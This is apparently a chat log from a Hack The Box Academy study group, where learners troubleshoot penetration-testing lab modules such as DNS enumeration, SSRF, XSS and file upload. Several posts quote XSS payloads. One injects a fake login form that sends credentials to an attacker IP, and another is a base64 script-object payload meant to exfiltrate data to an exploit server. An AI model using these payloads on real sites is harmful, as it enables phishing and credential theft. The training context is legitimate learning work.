Hello, I'm working through the Attacking Common Services module, specifically Attacking DNS. I'm trying to run subbrute per the hint and no matter what I do, I get a python error. I did update resolvers to ns.inlanefreight.htb. What am I doing wrong? I installed subbrute as listed in the example in the module reading

┌──(stinger㉿kali)-[~/Tools/subbrute]
└─$ ./subbrute.py -s names_small.txt -r resolvers.txt -p inlanefreight.htb
Warning: Fewer than 16 resolvers per process, consider adding more nameservers to resolvers.txt.
Warning: No nameservers found, trying fallback list.
Process lookup-3:
Traceback (most recent call last):
File "/usr/lib/python3.11/multiprocessing/process.py", line 314, in _bootstrap
self.run()
File "/home/stinger/Tools/subbrute/./subbrute.py", line 422, in run
response = self.check(hostname, query_type, timeout_retries)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/stinger/Tools/subbrute/./subbrute.py", line 342, in check
resp = self.resolver.query(host)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/stinger/Tools/subbrute/./subbrute.py", line 57, in query
name_server = self.get_ns()
^^^^^^^^^^^^^
File "/home/stinger/Tools/subbrute/./subbrute.py", line 107, in get_ns
ret = self.nameservers[self.pos]
~~~~~~~~~~~~~~~~^^^^^^^^^^
IndexError: list index out of range

lusty thicket
#

nslookup ns.inlanefreight.htb

#

to confirm

junior flicker
# lusty thicket to confirm

┌──(stinger㉿kali)-[~/Tools/subbrute]
└─$ nslookup ns.inlanefreight.htb
Server: 10.211.55.1
Address: 10.211.55.1#53

** server can't find ns.inlanefreight.htb: NXDOMAIN

cloud urchin
#

check your resolvers.txt make sure it's correct

junior flicker
#

What should that look like?

cloud urchin
#

its going to contain your nameserver(s), i don't know off the top of my head

#

it should just be a list of IP addresses or just one IP

#

i believe the module goes over how to create it

#

if it's using a hostname make sure it's in your hosts file

junior flicker
#

Oh, I was following what the reading did which added the domain name. I did update my etc/hosts just now and added the IP to my etc/hosts and it seems like it may be working now

#

Thank you! Hopefully that will get me the flag

rustic sage
#

any quick fix for Targets not spawning?

cloud urchin
#

ctrl + shift + r on the page and try again

rustic sage
#

I have refreshed page, revisited, etc. numerous times

rustic sage
#

That helped me

rustic sage
#

that worked

#

is this a super refresh?

cloud urchin
#

it's a hard refresh, completely ignores cache and re-downloads the whole page fresh from the site

rustic sage
#

Amazing, learning something new everyday

cloud urchin
#

hell yeah

graceful palm
#

came on here for the same issue

#

worked for me as well

#

thanks HAHA

junior flicker
rustic sage
#

Lovely!

sonic plume
#

Try to exploit the upload form to read the flag found at the root directory "/".

torpid crag
#

Can sm dm me I need help with sm badly

cloud urchin
torpid crag
#

I’m trying to learn and I wanted to know if sm could help me get started

cloud urchin
#

what is sm?

compact patrolBOT
torpid crag
#

Sorry I’m used to texting my friends like that

cloud urchin
#

always include the module/section you're in

rustic sage
#

This is attacking common services - HARD lab

cloud urchin
rustic sage
#

Oh soz

spare tendon
# winter schooner whats the issue?

@up
Hello,
It's about the gathering information - web edition. On the aknowledge assesment.
I used ffuf on the third question but i don't got any information

cloud urchin
rustic sage
#

I am trying to bruteforce a service with hydra and username is known, and the password is in the txt file. However, the issue is, hydra is not cracking the login, provided the username and the file (even tho the pass is in the file)

foggy monolith
#

Stuck on this one (Attacking Common Apps § Assessment Part 1) now myself because ||/m******/****|| is returning a 404 error which is keeping me bogged down trying to use ffuf to figure out what non-standard directory name is being used for the ||T******t|| manager, if any ― any ideas? @cloud urchin?

cloud urchin
#

idk which section you're on

foggy monolith
#

Attacking Common Applications § Assessment Part 1

cloud urchin
#

sorry can't help i didn't make any notes on that

grand portal
#

anyone who's has completed attacking common services module? need help

pine dune
#

Hi guys, is there a way to reset the exercises in modules?

cloud urchin
#

no

coarse monolith
#

Your username DEMON#7817

#

He talked to a four-year-old girl and I’m in a party with the guys talking to him

#

@everybody

cloud urchin
#

this isn't the place that can help you with that. contact the police.

coarse monolith
#

The cop want help it’s online

autumn pilot
#

@coarse monolith this is not the place

cloud urchin
#

they can subpeona the isp, they are actually the people who can help

coarse monolith
#

Isn’t this a hacker group chat?

autumn pilot
#

no

coarse monolith
#

What the fuck is this then?

autumn pilot
#

Google it and you will find out

cloud urchin
#

this is a study group

foggy monolith
#

It's a study group for penetration testing certifications. Not the place to send a request for someone to hack someone else off platform.

pine dune
cloud urchin
# pine dune will htb allow us to reset exercises in the future by any chance?

i have no idea i don't work for them, i have never heard of it being planned though. my guess is that it's somehow tied to unlocking the module forever if you complete it, but that's pure speculation. like if you reset your progress you may not 'own' it anymore in the system how it's coded. could be totally wrong.

pine dune
cloud urchin
#

you can always just go through the module again and spawn the target without looking at the answers

normal sand
#

Was just testing out tmux logging. The log file it created has escape sequences. I followed the steps in the Documentation & Reporting module. Is there a way to get a plaintext output for the logs?

fickle bison
#

anyone survived MSSQL, Exchange, and SCCM Attacks
Skills Assessment ? Exchange seems slow af

radiant lintel
#

having an issue with my nc shell on unified keep gettin strange sysmbols .

pine dune
#

Hi guys, having an issue installing requirments.txt for xsstrike

pine dune
safe star
#

With -r

pine dune
#

ok let me try

#

i dont have module named pip3

#

i tried with -r too

safe star
#

Just use pip3 alone

pine dune
#

ok let metry

#

i keep getting this when i try with other means

safe star
#

You gotta make a venv or use —break-system-packages to ignore that and potentially mess something up

pine dune
safe star
#

It shows you how in the error

pine dune
#

ok thanks, im using chat gpt for now as i started wit that

fathom pendant
pine dune
fathom pendant
#

With pip3

pine dune
#

ok thanks hold on

fathom pendant
#

You goober

pine dune
fathom pendant
#

My brother in christ

#

pip3 install -r requirements.txt --break-system-packages

storm elk
#

or just

fathom pendant
storm elk
#
source bin/activate
pip3 install -r requirements.txt```
pine dune
pine dune
#

sorry I thought I had already said I installed requirements.txt 😂 what I was facing was another problem, but I managed to solve that now

harsh tulip
#

guys do you know what is the issue here with printnightmare ?

opal nexus
safe star
foggy monolith
harsh tulip
safe star
#

Not sure but take another look at the version number @foggy monolith

reef pecan
#

What can mess up netcat listener? Trying to do Server Side Attacks -> Identifying SSRF module. Not receiving anything trying different things in both ZAP and BURP.

`POST /index.php HTTP/1.1
Host: 10.199.14.133
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

dateserver=http://10.199.14.133/availability.php&date=2024-01-01`

As I understand it, it should be my IP there? (tried, but changed for this post).

EDIT: Figured it out, only dataserver should be changed, but I was initially using outoing ip, not VPN IP.

foggy monolith
#

Trying the examples to see if there's anything there — also nothing.

vagrant wraith
#

Hey guys currently in ("Notetaking & Organization - Notetaking & Organization ") and the question is "Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.) " and so ive tried "Ctrl+B Alt+2" in brackets yet im not sure what im doing wrong any more hints please thank you.

foggy monolith
dawn cobalt
#

I’m not a hacker at all

#

I want to learn but I can’t

#

It’s hard

analog dock
#

Starting off with “I can’t” is definitely the way yeah

dawn cobalt
#

I can’t it’s so hard

analog dock
#

No one is saying you need to start with kernel exploitation

dawn cobalt
#

Bruh

analog dock
#

Hard

dawn cobalt
#

Ok

#

I have to learn cording

#

Hard

#

You are a pro hacker

#

💀

reef pecan
# dawn cobalt I’m not a hacker at all

Well, with saying "I am not a hacker", you are already following an important principle of not sharing publicly that you are a hacker. Keep it up! If you want confidence booster, try TryHackMe to half a difficulty.

south radish
#

Module: Attacking Web Applications with Ffuf
Section: Skills Assessment - Web Fuzzing
Hints says Use 'PORT' instead of the port shown above, like http://xxxxx.academy.htb:PORT/xxxxxxx ..etc but I don't understand what it means

reef pecan
south radish
#

I know but it says that I should not use port shown above and port shown above is 50925 Target(s): 94.237.55.189:50925

#

So I should use another port?

reef pecan
#

Use Target's port. I am not sure where it says this, I can't find it in that room.

solar arch
tranquil axle
#

hmmmmm

hallow flax
#

im stuck on "exploitation of pdf generation vulnerabilities". the hint says to look for "alternative common ports for web applications" but i cant find any viable options. anyone that can give me a further hint?

#

to be precise it says: "enumerate for..."

rustic sage
#

Hey, how's it going? I'm new to this and I'm a bit stuck with the Alert machine lol
I've tried a lot of things, ran manual exploits, used payload dictionaries to test different LFI variations, but nothing seems to be working,
I even tried using the discovered subdomain and concatenating it in the payload, but it still doesn't give me any info. I've been at it for 2 days now, haha.

dawn cobalt
#

I’m goi going to do it

rustic sage
#

I dont have access lol

crisp solstice
foggy monolith
#

Curious about this one too. Even went so far as to run find / -iname "flag.txt" 2>/dev/null without the . (thus starting at the root directory and searching through the whole file system) and, still nothing.

placid edge
#

i mean you are www-data

#

should prob find a way to escalate if find doesnt find the flag

tranquil axle
#

check here #modules message
I assume your machine syncs it clock back to normal after you sync it with the dc, so it undoes the syncing.

quick crown
#

Working on the module detecting windows attacks with splunk the section detecting unconstrained delegation/constrained delegation attacks. The question "Enter the name of the other computer on which there are traces of reconnaissance related to Unconstrained Delegation as your answer. Answer format: _.corp.local. When I run the splunk query I get back two machines Blue and DC01. Looking at the events for each machine I can't tell why the correct answer was the correct answer. They both seem to be correct. Can anyone share some info on this?

foggy monolith
placid edge
#

also, the flag might not be actually named flag.txt

#

unless it tells you it is

foggy monolith
#

Still not helping here. All the privesc vulnerabilities I'm seeing require horizontal from www-data to nagios first, which is where the problem lies.

#

Okay, so that's another deceptively worded module. Says it's flag.txt but it's really <random hex digits>_flag.txt — someone in #1234357888114364508 needs to update the module so it says that.

nocturne lake
#

Hi Everyone, i have a connection problem in SOC Role Path Windows Attacks&Defende Module
Can anyone help me?

#

ssh kali@10.129.152.37 (Target_IP)
ssh: connect to host 10.129.152.37 port 22: Connection refused

#

i am using a Pwnbox

rose root
#

Anyone else having trouble connecting to the pwnbox?

pine dune
brazen plover
hallow flax
#

im doing the Injection attacks module and im stuck on "exploit pdf generation vuln". did anyone do this mod?

rich osprey
#

Hi guy's i need help on the web service&api attacks module

rich osprey
#

?

rich osprey
#

i need help on the skill assesment

#

i do the the good payload but when i start the script i don't have any response

#

from the server

lusty thicket
#

preferably up to building soap requests

rich osprey
#

i. already do the soap requests

#

can i send you my request ?

lusty thicket
rich osprey
#

okay men someone else can help me ? FeelsBadMan

lofty whale
#

In active Directory Skills assessment 1 and its asking for something from MS01 but when I ping it it does not seem to be online. anyone else run into this issue?

viscid horizon
#

How I acess the photos

misty current
# lofty whale

Unless it's a DC, Windows machine has ICMP reply turned off by default mostly, so you can't ping them

viscid horizon
#

In hack the box

#

In discord in server

lofty whale
safe star
lofty whale
#

heard

foggy monolith
foggy monolith
#

I would have needed to use something like grep -rE "^[0-9a-fA-F]{32}$" / 2>/dev/null to find it using the recursive grep suggestion that @safe star made.

lusty thicket
lofty whale
foggy monolith
misty current
#

Yup, kenny is right about that

#

I wanted you to DM to check if you've set up a pivot to reach MS01

lofty whale
wild sage
#

Can someone tell me the exploit im supposed to use in msf to gain access to HOST-2 in Shells and Payloads skill assessment? I looked at the blog and did a searchsploit search for the exploit, but it doesn't show up in msf under the path given.

fathom pendant
#

just use <exploitname>

wild sage
#

Thank you, got it working now

pine dune
#

Hi guys, im on the phising section of the XSS module and i am struggling with the payload a little bit

#

here is my payload

#

when i enter it on the website it says "invalid URL"

#

I even commnted out the html at the end with "<!--"

viscid horizon
#

How to acees the photos,

lusty thicket
#

no quotes around ip

#

@pine dune

pine dune
#

document.write('<h3>Please login to continue</h3><form action=http://ip><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--

lusty thicket
pine dune
lusty thicket
#

can you try the same payload used in the module?

pine dune
#

i did try that, not working

#

keeps saying invalid url 😦

viscid horizon
#

I need to verfiy?

#

To seend photos

#

How,

storm elk
#

Follow the instructions provided

lusty thicket
pine dune
lusty thicket
pine dune
lusty thicket
sour lake
#

Can someone help me with the XSS Filter Bypass section of the Advanced XSS and CSRF Exploitation Module? I have found that the || <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> || can get an alert. However when I change the payload to the exploit server link and put my payload I don't seem to be getting anything on the exfiltrate.htb:PORT/log page. The hint says that you shouldn't put a port in the payload and I haven't but I can't seem to get it to work. Can someone help pls?

pine dune
#

````>document.write('<h3>Please login to continue</h3><form action=http://ip><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--```

lusty thicket
#

wrap in '><script></script>

pine dune
toxic elbow
#

guy, i need some help with a module, the situation is that when i entered my answer for question, it was wrong eventhough i had checked with Reveal Answer and my answer is correct. Can i ask it here ...

pine dune
#
document.write('<h3>Please login to continue</h3><form action="http://ip"><input type="text" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
document.getElementById('urlform')?.remove();
</script>
toxic elbow
#

the module i was doing was Intro to Whitebox Pentesting, i was stucked in Eval injection. The answer for my question was {"message":"The input "";//" contains the following invalid characters: [",,;,]"} and i had checked with Reveal Answer, i even tried copy the solution from it but it did not work

pine dune
#

why doesnt the payload from htb work on the website

lusty thicket
pine dune
#

also i tried this

#

'><script>document.write('<h3>Please login to continue</h3><form action=http://ip:80/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

tropic rune
#

Hi guys, I'm doing the Linux fundamnetals course and I'm on the System information pages. I'm trying to ssh to the htb-student user but it's not working on parrot terminal

#

Is there specific way I need to do this?

pine dune
tropic rune
dapper moth
#

If you want you can use sshpass

pine dune
#

apparretly even this is a invalid url?? is there something wrong with the machine?

tranquil axle
lusty thicket
# pine dune

looks like you’re supposed to host the malicious script on your machine?

tranquil axle
#

then it probably complains because it doesn't real internet access so it cant resolve google.com

pine dune
#

ahh I see

lusty thicket
#

awesome

pine dune
#

its not working man 😭 I dont know wth is going on 😭 im getting really burnt out but my ocd wont let me quit

lusty thicket
#

doesn’t the module discuss this?

pine dune
#

i also searched it up on htb

#

heres a comment

#

Is anyone else having issues with their servers going down regularly? You submit a form and it tells you that the connection timed out? Happens to me every 30 seconds or so.```
lusty thicket
#

when you enter your hosts ip and listening port as an url
do you get a hit?

lusty thicket
pine dune
brazen apex
#

Currently having issues with Module #Attacking Common Services Section#DNS. I'd like to confirm that I'm querying the server correctly.

||I'm currently using a fuzzer trying subdomains against inlanefreight.htb using my target IP address that was generated as the resolver. Is this the correct way to do this. I've only received one response being `hr.inlanefreight.htb which is an empty record||

lusty thicket
pine dune
lusty thicket
brazen apex
pine dune
#

its already bloody slow

lusty thicket
#

somewhere in settings

lusty thicket
pine dune
#

ahh ok ill have a look

brazen apex
#

No that is the issue i'm experiencing, is that HTB didn't provide context whether I should be using ||ns1|| as a resolver or if I should use the generated IP address.

#

Using ||ns1|| as the resolver didn't give me any results either

lusty thicket
pine dune
brazen apex
#

"Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. "

#

I assume they mean find all subdomains for inlanefreight.htb. And submit the SOA for one of them that is clearly the flag

lusty thicket
brazen apex
#

What so you think I should use inlanefreight.htb as the resolver?

lusty thicket
brazen apex
#

SOA is a dns record its like a comment or certification

#

pretty sure anyways, i could be wrong

safe star
#

Did you try a zone transfer?

sacred gull
#

Is anyone else having issues with machines? I cant get a stable connection RDPing into a windows machine. Connection keeps dropping

brazen apex
# safe star Did you try a zone transfer?

I did mess with it a bit but I kinda skipped it, since the hint suggests that I use the github tool subbrute which is a subdomain enumerator and Im not sure how you would fuzz subdomains in a zone transfer.

Thank you for the advice ill try this out

lusty thicket
lusty thicket
mystic fjord
sacred gull
brazen apex
rustic sage
#

Helo everyone I lost my account due to 2fa and password forgot can someone pls help me

mystic fjord
rustic sage
storm elk
lusty thicket
storm elk
#

We can’t help you. If you lost access to an account, contact the support department of the service

mystic fjord
#

Has anyone else had problems with the exercises in the "File Upload" module? I thought it was something with my computer, but I tried to solve the exercises in AttackBox with the step-by-step solution and I still can't upload the files correctly and Intruder's answers are confusing (it tells me I can upload a file with a certain extension but when I try it doesn't allow me). Is this normal? Or does it just happen to me?

storm elk
#

With what?

pine dune
#

its not working

#

i tried adding multiple payloads

#

heres my payload

storm elk
#

Send me a dm please, I’ll have a look tomorrow when I get on my pc

pine dune
#

ok thank you

lusty thicket
midnight galleon
#

btw, in attacking common module, is gitlab thing of registering an account and viewing public repos really a vuln?

storm elk
#

It’s 21:40 and I’m too tired to think 🤣